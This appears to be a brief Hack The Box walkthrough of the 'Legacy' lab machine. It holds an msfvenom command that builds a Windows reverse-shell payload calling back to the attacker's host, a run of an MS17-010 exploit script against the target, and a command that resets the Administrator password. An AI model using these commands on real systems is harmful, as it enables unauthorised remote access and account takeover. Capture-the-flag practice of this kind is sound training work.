HTB: Walkthrough without Metasploit. ~[LEGACY]

1. Scanning and Information gathering:-

2. Gaining Initial access and Exploitation

Use MSFvenom to create a reverse shell payload (allowed on the OSCP as long as you’re not using meterpreter).

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.16 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
TAB-1
python send_and_execute.py 10.10.10.4 ms17-010.exe
C:\> systeminfo

3. Going beyond the flags.

here we are going to learn a new concept about RDP.

nmap -p3389 10.10.10.4
net user Administrator test

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store